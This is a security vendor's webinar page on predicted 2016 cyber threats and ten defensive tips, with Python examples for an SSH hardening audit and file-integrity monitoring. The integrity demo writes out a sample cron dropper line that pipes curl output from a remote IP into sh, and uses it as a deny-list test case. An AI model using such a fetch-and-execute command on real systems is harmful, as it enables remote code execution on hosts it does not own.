Top Cyber Threats Expected in 2016!
What Can You Expect & What Can You do to Protect Yourself?
It should come as no surprise that cyber threats continue to evolve, both in sophistication and in the level of threat they represent. Despite this, there is an equally improving maturity within the cyber security community, and growing evidence that a simple, pragmatic, best-practice approach to security is more than capable of fending off the threat.
Watch our first webinar of 2016, NNT's 2016 Threat Predictions Webinar. Hear from NNT CTO Mark Kedgley and US Country Manager Mark Kerrison as they summarize some of the expected changes in the threat landscape and some smart automated monitoring tactics you can deploy to improve security while still leaving you time to focus on your day job.
You’ll learn:
- Summary Of The Top Predicted Threats For 2016
- The Typical Mistakes Made By Most IT Teams
- The Use Of Automated ‘Threat Intelligence & Change Detection’ To Weed Out Malicious Activity
- 10 Tips For An Improved IT Estate
Video Transcript
Agenda
- Summary Of The Top Predicted Threats For 2016
- Mark Teicher, HP Enterprise – From My Experience
- The Typical Mistakes Made By Most IT Teams
- 10 Tips For An Improved IT Estate
- The Use Of Automated ‘Threat Intelligence & Change Detection’
- Q & A
What Do Experian Think?
Interestingly, the consensus outlook for credit card theft remains gloomy: 47% predict no decrease at all, never mind any improvement.
Healthcare records are worth ten times as much as credit card data. Healthcare providers have notoriously poor defenses: the FBI issued warnings following a run of breaches, including one leading provider that had 4.5 million records compromised.
Cyber war between enemy nations may extend to public facilities such as airports, hospitals and government buildings.
Hacktivism, both corporate shaming and 'cause-based', will increase; it is considered the ultimate leveler.
What Do Trend Think?
2016 will see an increase in online extortion; we have already seen examples such as the LA Presbyterian Med Center.
At least one consumer-grade smart device will cause fatalities; drones and medical smart devices are considered risky.
China will drive mobile malware growth to 20M by the end of 2016 (3 out of 4 apps are malware?)
Hacktivism will increase as a result of proven corporate naming and shaming, as well as geopolitical targets.
Despite all of this, less than 50% of organizations will have dedicated IT protection specialists.
Cybercrime legislation will become a global movement.
What Do Gartner Think?
Gartner take a somewhat different approach, in that they offer recommendations rather than predictions:
- The attack surface is changing all the time: new targets, along with bimodal and shadow IT, are driving the shift
- Focus on configuration hardening rather than over-focusing on zero-day APTs. A nod towards pragmatism, perhaps?
- Balance focus between perimeter and core
- Map your estate for visibility: the better you understand what you have, the better you can protect and monitor it
- Emphasize prevention over detection, and focus on the fundamentals of cyber protection rather than the latest thing!
The key point here is that, based on past experience, most attacks have been and remain avoidable:
- Gartner report that 99.99% of exploits are based on vulnerabilities known for at least a year
- They expect this to continue through 2020: "Don't focus too much on zero-day threats!"
- Last year's most prevalent malware, Conficker, relied on a seven-year-old Windows vulnerability. Disable 'autorun', 'runonce' etc.
- Known vulnerabilities will increasingly be sold on the black market
What Do NNT Think?
- The field of attack is ever broadening as new lucrative and/or disruptive targets are identified, and those with a cause, however justifiable, seek to enter the arena
- Regular crooks and Teamsters will join the cybercrime movement; it is no longer the domain of specialist hackers
- We think that every single person attending this webinar will in some way fall victim to cybercrime in 2016, however lightly. It could just be unwanted spam, but it could equally be stolen Social Security, credit card or other personal data
- Apathy ("it won't happen to us") and cost remain the two major blocks to corporate and government cyber security
- The litigators are circling!
Mark Teicher, HP Enterprise – From My Experience?
- Understand what you have – estate Visibility is crucial
- Document?
- Train?
- Motivate the people around you into action
The Typical Mistakes Made by Most IT Teams - You get told you need security products
So we all get sold on the need for cyber security defense measures, and there is plenty of FUD used to amplify the urgency and acuteness of the need. But the problem is often the same as with personal health cures: there are always vendors in the market claiming they can cure all known threats when actually, just like personal health, it just isn't as simple as that. Cyber security takes many forms, and the range and nature of threats is so varied that there is no getting away from the fact that it requires a multi-faceted solution.
The Typical Mistakes Made by Most IT Teams - How Security Products are sold
But it's easy to be tempted by the pitch! A sexy-looking security appliance that looks better than your stereo (or whatever it is that you play music on these days) is tempting. And if it really can capture and defeat APTs, phishing attacks, malware, insider threats, hacktivism, rogue employees, ransomware and government-sponsored/blue-chip espionage, then all our problems are solved? Analysts play a part in this too: they love a new concept, a new company and a new idea, and their lifeblood is the new.
The most recent examples are the 'new generation' sandbox-technology appliances. They do a great job of identifying and isolating malware, especially the APT-style malware that actively downloads additional components once in place and then exfiltrates data from the network. But not all APT malware: heavily obfuscated code combined with delayed execution, so that the payload never fires during the sandbox's observation window, can circumvent the sandbox's detection capabilities. And any malware introduced by employees, intentionally or unintentionally, never passes through the appliance and so is never scrutinized by it. So even a great piece of technology is invariably limited, and the same is true of all the SIEM systems, IPS, AV and even the FIM systems out there. Apart from ours, of course :-)
One day, when they close all the gyms, pharmacies and hospitals and replace them with juice bars we may also be able to forget about cyber security due to some kind of all-seeing super-intelligent appliance that controls everyone and everything, but until then, we all know it is going to be a case of doing a wide range of things well.
The Typical Mistakes Made by Most IT Teams - Why Corporate Cyber Security fails
So if you really could lose weight, build a six-pack and get marathon-beating stamina from drinking a kale and Persian cucumber milkshake, would you do it?
Maybe, but not everyone would succeed; in fact most would give it up and go back to bad habits. Cyber security is similar: it's a 24/7 discipline and requires a combination of technology measures, procedures and working practices to maintain solid defenses. This is why organizations get breached, and will continue to get breached, unless a cyber security mind-set becomes second nature for all employees.
But in the meantime….
Top Ten Cyber Security Tips
- Mitigate Vulnerabilities
- Firewall or better, IPS
- AV
- EMET
- AppLocker
- System Integrity Monitoring
- Change Control – augmented with Threat Intelligence
- Promote and enforce an IT Security Policy
- BitLocker
- Finally - Don’t be too thrown off course by the latest ‘must-haves’
….in the meantime, what should you be focusing on?
Here's a quick summary; there are more comprehensive security policies, standards and guidelines out there: see the PCI DSS (version 3.2 is almost here) or any of the other standards I showed earlier, such as NERC CIP and NIST 800-53. There are also generic policies, like the SANS Top 20 or the CIS Security Policy, that are freely available.
Top Ten Cyber Security Tips: 1
1. Mitigate Vulnerabilities
- Hugely effective in protecting IT Assets
- Mandatory for all Compliance and Security Policies
- NIST 800-53, PCI DSS, HIPAA, STIG, NERC CIP, SOX
- Effectively Free of Charge
Easier said than done, and most security policies duck out of providing specific prescriptive guidance, partly because this is a fluid area where the latest intelligence is always needed, but also because vulnerabilities need to be balanced against risk and operational requirements.
In other words, most security professionals will tell you to minimize open ports and remove any unnecessary services, in particular FTP and web servers, so a typical hardening exercise involves removing these. But if you actually need them for your application, you will have to provide security by other means, and record the exception so that the residual risk stays visible rather than disappearing from the audit.
The latest Microsoft security policy covers literally thousands of settings that control the functional operation, and in turn the security, of a host, so deriving the best balanced build standard can be a painstaking task. Fortunately automated auditing using file integrity monitoring or vulnerability scanning tools is available, not least in Change Tracker Gen 7, which uses the best guidance available: the Center for Internet Security Benchmarks. CIS Benchmarks are free to download in their text form, and for each recommendation they provide a description of the weakness, how to audit for its presence and how to remediate it if required.
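As an added illustration of how a benchmark-style audit works (example code written for this page, not Change Tracker or the CIS Benchmarks themselves), the Python below parses a constructed sshd_config, applies a handful of rules laid out in the benchmark pattern of description / audit / remediation, and lets you record an accepted risk for a rule the application genuinely needs so the exception stays visible instead of being silently skipped. The rule identifiers, the sample config and the exception text are all assumptions made for the example.

```python
"""Benchmark-style hardening audit: constructed example, not NNT or CIS code."""
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple

Settings = Dict[str, str]


def parse_sshd_config(text: str) -> Settings:
    """Parse 'Keyword value' lines as sshd does: keywords are case-insensitive,
    '#' lines are comments, and the FIRST occurrence of a keyword wins."""
    settings: Settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        settings.setdefault(key, value)   # later duplicates are ignored
    return settings


def _get(settings: Settings, key: str, default: str) -> str:
    """Look up a keyword, falling back to the daemon default when it is unset."""
    return settings.get(key.lower(), default).lower()


@dataclass(frozen=True)
class Rule:
    ident: str                          # illustrative id, not a real CIS number
    title: str                          # description of the weakness
    audit: Callable[[Settings], bool]   # True when the setting is compliant
    remediation: str                    # what to change if it is not


# Four rules modelled on the CIS "audit / remediate" layout. The defaults passed
# to _get() mirror historical sshd defaults so an absent keyword is judged too.
RULES: List[Rule] = [
    Rule("SSH-01", "Root login over SSH is permitted",
         lambda s: _get(s, "PermitRootLogin", "yes") == "no",
         "Set 'PermitRootLogin no' and reload sshd."),
    Rule("SSH-02", "MaxAuthTries allows excessive password guesses",
         lambda s: _get(s, "MaxAuthTries", "6").isdigit()
         and int(_get(s, "MaxAuthTries", "6")) <= 4,
         "Set 'MaxAuthTries 4'."),
    Rule("SSH-03", "Empty passwords are accepted",
         lambda s: _get(s, "PermitEmptyPasswords", "no") == "no",
         "Set 'PermitEmptyPasswords no'."),
    Rule("SSH-04", "X11 forwarding is enabled",
         lambda s: _get(s, "X11Forwarding", "no") == "no",
         "Set 'X11Forwarding no' unless the host genuinely needs it."),
]


def audit(settings: Settings, rules: List[Rule],
          accepted: Optional[Dict[str, str]] = None) -> List[Tuple[Rule, str]]:
    """Return (rule, status) pairs. A failing rule listed in `accepted`
    (ident -> justification) is reported as an accepted risk, not a failure,
    which keeps operational exceptions visible rather than hidden."""
    accepted = accepted or {}
    results = []
    for rule in rules:
        if rule.audit(settings):
            status = "PASS"
        elif rule.ident in accepted:
            status = "ACCEPTED: " + accepted[rule.ident]
        else:
            status = "FAIL: " + rule.remediation
        results.append((rule, status))
    return results


def failing(settings: Settings, rules: List[Rule],
            accepted: Optional[Dict[str, str]] = None) -> List[str]:
    """Identifiers of rules that fail and have no accepted exception."""
    return [r.ident for r, s in audit(settings, rules, accepted)
            if s.startswith("FAIL")]


# Constructed sample file (not from a real host). Note the duplicated
# PermitRootLogin: sshd honours the first value, so the host is still exposed.
SAMPLE_SSHD_CONFIG = """\
# constructed sshd_config for the example
Port 22
PermitRootLogin yes
MaxAuthTries 10
X11Forwarding yes
PermitEmptyPasswords no
PermitRootLogin no
"""

if __name__ == "__main__":
    cfg = parse_sshd_config(SAMPLE_SSHD_CONFIG)
    exceptions = {"SSH-04": "X11 needed for remote GUI admin, CHG-0173"}
    for rule, status in audit(cfg, RULES, exceptions):
        print(f"{rule.ident} {rule.title}: {status}")
```

The parser deliberately copies sshd's first-value-wins behaviour: a hardening script that appends `PermitRootLogin no` to the end of the file will pass a naive grep but leaves root login enabled, and the audit above catches that.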
Top Ten Cyber Security Tips: 2,3,4 & 5
2. Firewall or better, IPS
3. AV
4. EMET
5. AppLocker
- Tip: See https://www.nntws.com/ransomware-phishing-defenses.html
- Tip: UAC should be your starting point in locking down systems (Windows) or Least Privilege (*Nix)
- Tip: Windows Defender, EMET and AppLocker are all free add-ons
The best understood elements of any cyber security kitbag are the firewall and AV. They are fallible, as we all know: zero-day threats easily evade AV, even while the AV is gobbling up system resources and, more often than not, getting in the way.
Likewise for the firewall or IPS: there are numerous ways to leapfrog the firewall using phishing attacks, APT technology or just plain old inside help. However, as we said earlier, there isn't going to be a quick fix, a single course of action or technology that will keep us secure, and these legacy security components still play an essential role.
Less well understood are some of the complementary technologies available that can be used to plug further weak spots. The market is awash with good ideas and sexy sounding technology – ‘enterprise auto immunization based on Bayesian probability analytics’ is the latest slick sales pitch doing the rounds and while very attention grabbing, I would say to look at what is available to you right now, but is probably not being used.
Namely EMET and AppLocker: both are Microsoft offerings, free to use, but they require a little knowhow and experimentation to implement.
EMET applies exploit mitigations such as DEP, ASLR, SEHOP and ROP checks to the processes you choose, so it heads off a number of malware techniques, especially 'file-less' attacks that rely on process hijacking, memory-corruption exploits and browser vulnerabilities; its certificate-pinning rules also help against man-in-the-middle attacks on SSL/TLS.
AppLocker provides the means to whitelist or blacklist executables, scripts, installers and DLLs, to really lock down PC and server operation. Start in audit-only mode, so the event log shows what would have been blocked, before switching the rules to enforce.
There are many commercial offerings covering similar areas, of course, but neither of these, nor Windows Defender, should be overlooked.
Top Ten Cyber Security Tips: 6 & 7
6. System Integrity Monitoring
7. Change Control – augmented with Threat Intelligence
There are three main reasons why change control and system integrity monitoring are vital to maintaining cyber security.
Firstly, now that we have done all our vulnerability mitigation and secure configuration work, we want it to stay in effect from then on. So we need a means of detecting when systems change, understanding what changed, and judging whether it weakens security. This is still best handled with file integrity monitoring technology.
Second, any change or update could affect functional operation, so it is vital we have visibility of every change made.
Finally, if we can see changes as they happen, and especially if we can reconcile them against details of known, planned changes, then we have a highly sensitive breach detection mechanism: anything that does not match a planned change is suspicious by default.
All leading cyber security policies/standards call for change control and system integrity monitoring for all these reasons; it is key.
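To make the three reasons concrete, here is an added Python example (written for this page; it is not Change Tracker code) that takes a SHA-256 baseline of a directory, detects additions, modifications and removals, and then reconciles each change against a record of planned changes and a hash deny list standing in for a threat-intelligence feed. The directory contents, the change ticket, the deny-list hash and the timestamps are all constructed for the example.

```python
"""Integrity baseline, change detection and change reconciliation.
Added example for this page; not NNT Change Tracker code. All files, the
planned-change record and the deny-list hash are constructed below."""
import hashlib
import tempfile
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from pathlib import Path
from typing import Dict, List, Optional, Set, Tuple


def sha256_file(path: Path) -> str:
    """Stream the file so large binaries do not have to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root: Path) -> Dict[str, str]:
    """Map every regular file under root (POSIX-style relative path) to its hash."""
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


@dataclass(frozen=True)
class PlannedChange:
    ticket: str
    path: str
    window_start: datetime
    window_end: datetime
    expected_hash: Optional[str] = None  # None: any new content in the window is accepted


@dataclass(frozen=True)
class Finding:
    path: str
    kind: str       # added | modified | removed
    verdict: str    # planned | unplanned | known-bad
    note: str


Event = Tuple[str, str, Optional[str]]   # (path, kind, new hash or None)


def detect(baseline: Dict[str, str], current: Dict[str, str]) -> List[Event]:
    """Reasons 1 and 2: surface every drift from the hardened baseline."""
    events: List[Event] = []
    for path in sorted(set(baseline) | set(current)):
        old, new = baseline.get(path), current.get(path)
        if old == new:
            continue
        kind = "added" if old is None else "removed" if new is None else "modified"
        events.append((path, kind, new))
    return events


def reconcile(events: List[Event], planned: List[PlannedChange],
              bad_hashes: Set[str], seen_at: datetime) -> List[Finding]:
    """Reason 3: a change is only benign if a change record covers that path
    at that time (and the delivered hash, if one was declared). The deny list
    is checked first so a 'planned' change cannot launder known-bad content."""
    findings = []
    for path, kind, new_hash in events:
        if new_hash is not None and new_hash in bad_hashes:
            findings.append(Finding(path, kind, "known-bad", "hash on threat-intel deny list"))
            continue
        ticket = next((p.ticket for p in planned
                       if p.path == path and p.window_start <= seen_at <= p.window_end
                       and (p.expected_hash is None or p.expected_hash == new_hash)), None)
        if ticket:
            findings.append(Finding(path, kind, "planned", f"reconciled to {ticket}"))
        else:
            findings.append(Finding(path, kind, "unplanned", "no change record covers this path and time"))
    return findings


def demo() -> Dict[str, str]:
    """Build a baseline, make one planned, one unplanned and one known-bad change,
    and return {path: verdict}."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "etc" / "cron.d").mkdir(parents=True)
        (root / "bin").mkdir()
        (root / "etc" / "app.conf").write_bytes(b"listen=443\n")
        (root / "etc" / "cron.d" / "backup").write_bytes(b"0 2 * * * root /usr/bin/backup\n")
        (root / "bin" / "agent").write_bytes(b"#!/bin/sh\necho agent v1\n")
        baseline = snapshot(root)

        now = datetime(2016, 3, 1, 2, 0, tzinfo=timezone.utc)
        planned = [PlannedChange("CHG-1042", "etc/app.conf",
                                 now - timedelta(hours=1), now + timedelta(hours=1))]
        # Constructed deny-list entry: hash of a (fake) cron dropper line.
        dropper = b"* * * * * root curl http://198.51.100.7/x | sh\n"
        bad_hashes = {hashlib.sha256(dropper).hexdigest()}

        (root / "etc" / "app.conf").write_bytes(b"listen=8443\n")            # within CHG-1042
        (root / "bin" / "agent").write_bytes(b"#!/bin/sh\necho agent v2\n")  # nobody raised a ticket
        (root / "etc" / "cron.d" / "update").write_bytes(dropper)            # matches deny list

        findings = reconcile(detect(baseline, snapshot(root)), planned, bad_hashes, now)
        return {f.path: f.verdict for f in findings}


if __name__ == "__main__":
    for path, verdict in demo().items():
        print(f"{verdict:10} {path}")
```

Two design points worth copying into a real deployment: the deny-list check runs before the planned-change match, so an approved ticket cannot be used to wave through content that threat intelligence already knows is bad; and `expected_hash` lets a change record pin the exact artefact that was supposed to land, which turns "something changed during the window" into "the right thing changed during the window".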
Top Ten Cyber Security Tips: 8 & 9
8. Promote and enforce an IT Security Policy
9. Encryption (BitLocker)
- The biggest security weakness is the one using the keyboard
- Data Encryption is a blunt instrument, but could save your neck!
- Tip: MS BitLocker is included with Windows
Mark Teicher highlighted this earlier: cyber security isn't just the responsibility of the IT team and their security kit, but must be an organization-wide competence.
Children grow up being taught about food hygiene; it isn't just the remit of professional chefs. Until cyber security hygiene becomes a basic life skill, it will be down to the workplace to educate.
Just in case you don't already have flyers/posters for cyber security education, there are plenty of resources available; again, the SANS Institute provide a bunch of these that are free to use and very good.
The other area I wanted to highlight here is data encryption. It slows everything down and gets in the way on a daily basis, BUT it can prove a lifesaver if there is a breach that results in data theft. Loss of a company laptop is a pain, but the loss of confidential data could result in anything from acute embarrassment to fines and lawsuits. Plenty of commercial options exist, and there is also a free-of-charge MS option for this too in BitLocker. You can use it to encrypt all drives, or just data on local and removable drives.
In an enterprise environment this is controlled via Group Policy and, as such, can also be audited using Change Tracker. The cool thing is that this audit report not only provides the recommended settings to use when first implementing BitLocker, but also highlights any drift from your preferred corporate build standard, along with all the other security settings needed to protect systems.
Top Ten Cyber Security Tip: 10
10. Finally - Don’t be too thrown off course by the latest ‘must-haves’
- No such thing as 100% security
- No magic bullet (for cyber security or personal health)
- Cyber security still requires a layered approach, and still requires some work
- BUT it can be automated and made easier by good technology
And Finally
And the final piece of advice really is to focus on getting the fundamentals right and not chase the niche point products.
If 'no such thing as 100% security' is accepted, then how are you going to achieve cyber security?
The only answer is that it will need to be managed as a layered, 360-degree discipline, comprising technology and processes to first establish and then maintain security.
Get your technology right for the general, everyday security before investing too much time and money into the latest hot product. Vulnerability Management, System Hardening, File Integrity Monitoring, Change Control and Breach Detection are some of the absolutely essential components needed – the good news is we can help automate and simplify all of this in one unified solution.
- Read the article 2016 Cyber Security Threat Predictions and Why Nutrient-Extracting Blenders Still aren’t the Answer
- Download the white paper 2016 Threat Predictions and Top Ten Cyber Security Tips To Keep You Safe